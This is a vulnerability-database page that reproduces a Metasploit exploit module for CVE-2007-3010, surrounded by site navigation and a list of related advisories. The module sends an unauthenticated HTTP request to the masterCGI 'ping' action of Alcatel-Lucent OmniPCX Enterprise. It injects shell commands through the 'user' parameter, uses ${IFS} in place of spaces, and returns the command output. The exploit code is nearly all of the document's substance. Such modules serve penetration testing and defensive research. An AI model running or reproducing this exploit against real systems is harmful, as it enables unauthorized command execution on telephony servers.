Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPatrickPACKETSTORM:82234
HistoryOct 27, 2009 - 12:00 a.m.

Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution

2009-10-2700:00:00
patrick
packetstormsecurity.com
22

0.973 High

EPSS

Percentile

99.8%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution',  
'Description' => %q{  
This module abuses a metacharacter injection vulnerability in the  
HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise  
Communication Server 7.1 and earlier. The Unified Maintenance Tool  
contains a 'masterCGI' binary which allows an unauthenticated attacker  
to execute arbitrary commands by specifing shell metacharaters as the  
'user' within the 'ping' action to obtain 'httpd' user access. This  
module only supports command line payloads, as the httpd process kills  
the reverse/bind shell spawn after the HTTP 200 OK response.  
},  
'Author' => [ 'patrick' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
[ 'OSVDB', '40521' ],  
[ 'BID', '25694' ],  
[ 'CVE', '2007-3010' ],  
[ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ],  
],  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,   
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 1024,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic'  
}  
},  
'Targets' =>   
[  
[ 'Automatic Target', { }]  
],  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(443),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
], self.class)  
end  
  
def exploit  
connect  
  
cmd = payload.encoded.gsub(" ", '${IFS}')  
req =   
"GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" +  
"Host: #{rhost}\r\n\r\n"  
  
print_status("Sending GET request with command line payload...")  
sock.put(req)  
  
res = sock.get(3,3)  
  
if (res =~ /<h5>(.*)<\/h5>/smi)  
out = $1  
print_line(out.gsub(/<h5>|<\/h5>/, ''))  
return  
end  
  
handler  
disconnect  
end  
  
end  
  
`

Related

securityvulns 2
packetstorm 1
cve 1
cisa_kev 1
prion 1
attackerkb 1
nuclei 1
checkpoint_advisories 1
openvas 2
securityvulns
securityvulns
Alcatel-Lucent OmniPCX code execution
2007-09-19 00:00:00
Alcatel-Lucent OmniPCX Remote Command Execution
2007-09-19 00:00:00
packetstorm
packetstorm
rt-sa-2007-001.txt
2007-09-18 00:00:00
cve
cve
CVE-2007-3010
2007-09-18 21:17:00
cisa_kev
cisa_kev
Alcatel OmniPCX Enterprise Remote Code Execution Vulnerability
2022-04-15 00:00:00
prion
prion
Design/Logic Flaw
2007-09-18 21:17:00
attackerkb
attackerkb
CVE-2007-3010
2007-09-18 00:00:00
nuclei
nuclei
Alcatel-Lucent OmniPCX - Remote Command Execution
2023-10-13 16:05:59
checkpoint_advisories
checkpoint_advisories
Command Injection - Ver2 (CVE-2007-3010)
2014-03-03 00:00:00
openvas
openvas
Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability
2012-04-26 00:00:00
Alcatel-Lucent OmniPCX Enterprise Remote Command Execution Vulnerability
2012-04-26 00:00:00

0.973 High

EPSS

Percentile

99.8%

JSON
Related for PACKETSTORM:82234
securityvulns2packetstorm1cve1cisa_kev1prion1attackerkb1nuclei1checkpoint_advisories1openvas2